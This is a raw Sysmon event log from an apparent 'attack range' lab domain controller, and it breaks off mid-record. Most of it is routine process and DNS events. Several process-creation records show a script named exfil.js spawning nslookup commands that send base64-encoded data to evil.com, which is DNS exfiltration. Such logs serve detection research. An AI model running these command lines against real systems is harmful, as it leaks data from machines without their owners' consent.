14:16:10.288{2E1864BB-17AA-629A-343E-000000005F02}64367344C:\Windows\system32\conhost.exe{2E1864BB-17AA-629A-333E-000000005F02}6304C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195296Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.273{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17AA-629A-343E-000000005F02}6436C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195295Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.273{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195294Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.273{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195293Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.273{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195292Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.273{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195291Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.273{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17AA-629A-333E-000000005F02}6304C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195290Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.273{2E1864BB-17A1-629A-783D-000000005F02}55525384C:\Windows\System32\WScript.exe{2E1864BB-17AA-629A-333E-000000005F02}6304C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195289Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.272{2E1864BB-17AA-629A-333E-000000005F02}6304C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Kioqd2luMzJfY29tcHV0ZXJzeXN0ZW0qKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlbqqcvcd.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000195288Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.257{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlibiw.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000195287Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.225{2E1864BB-17AA-629A-313E-000000005F02}20325828C:\Windows\system32\conhost.exe{2E1864BB-17AA-629A-323E-000000005F02}6560C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195286Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.225{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195285Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.225{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195284Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.225{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195283Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.225{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195282Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.225{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17AA-629A-323E-000000005F02}6560C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195281Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.225{2E1864BB-17AA-629A-303E-000000005F02}80967840C:\Windows\system32\cmd.exe{2E1864BB-17AA-629A-323E-000000005F02}6560C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195280Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.228{2E1864BB-17AA-629A-323E-000000005F02}6560C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17AA-629A-303E-000000005F02}8096C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlibiw.tmp 2>&1 354300x8000000000000000195279Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.792{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52206- 354300x8000000000000000195278Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.791{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52205- 354300x8000000000000000195277Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.790{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52204- 354300x8000000000000000195276Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.693{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52203- 354300x8000000000000000195275Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.693{00000000-0000-0000-0000-000000000000}7996<unknown process>-udptruefalse127.0.0.1-52203-false127.0.0.1-53domain 354300x8000000000000000195274Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.577{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52202- 354300x8000000000000000195273Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.577{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52201- 354300x8000000000000000195272Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.576{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52200- 354300x8000000000000000195271Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.576{00000000-0000-0000-0000-000000000000}7528<unknown process>-udptruefalse127.0.0.1-52200-false127.0.0.1-53domain 354300x8000000000000000195270Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.493{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52199- 354300x8000000000000000195269Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.492{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52198- 354300x8000000000000000195268Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.492{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52197- 354300x8000000000000000195267Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.492{00000000-0000-0000-0000-000000000000}8040<unknown process>-udptruefalse127.0.0.1-52197-false127.0.0.1-53domain 354300x8000000000000000195266Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.394{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52196- 354300x8000000000000000195265Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.394{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52195- 354300x8000000000000000195264Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.393{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52194- 354300x8000000000000000195263Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.393{00000000-0000-0000-0000-000000000000}6688<unknown process>-udptruefalse127.0.0.1-52194-false127.0.0.1-53domain 354300x8000000000000000195262Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.267{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52193- 354300x8000000000000000195261Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.266{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52192- 354300x8000000000000000195260Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.265{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52191- 10341000x8000000000000000195259Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.188{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17AA-629A-313E-000000005F02}2032C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000195258Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.265{00000000-0000-0000-0000-000000000000}3792<unknown process>-udptruefalse127.0.0.1-52191-false127.0.0.1-53domain 354300x8000000000000000195257Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.182{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52190- 354300x8000000000000000195256Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.181{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52189- 354300x8000000000000000195255Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.181{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52188- 10341000x8000000000000000195254Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.188{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17AA-629A-313E-000000005F02}2032C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000195253Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.180{00000000-0000-0000-0000-000000000000}6604<unknown process>-udptruefalse127.0.0.1-52188-false127.0.0.1-53domain 354300x8000000000000000195252Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.081{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52187- 354300x8000000000000000195251Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.080{00000000-0000-0000-0000-000000000000}3848<unknown process>-udptruefalse127.0.0.1-52187-false127.0.0.1-53domain 354300x8000000000000000195250Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.988{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52186- 354300x8000000000000000195249Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.988{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52185- 354300x8000000000000000195248Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.988{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52184- 354300x8000000000000000195247Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.988{00000000-0000-0000-0000-000000000000}3568<unknown process>-udptruefalse127.0.0.1-52184-false127.0.0.1-53domain 10341000x8000000000000000195246Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.188{2E1864BB-17AA-629A-313E-000000005F02}20325828C:\Windows\system32\conhost.exe{2E1864BB-17AA-629A-303E-000000005F02}8096C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195245Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.172{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17AA-629A-313E-000000005F02}2032C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195244Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 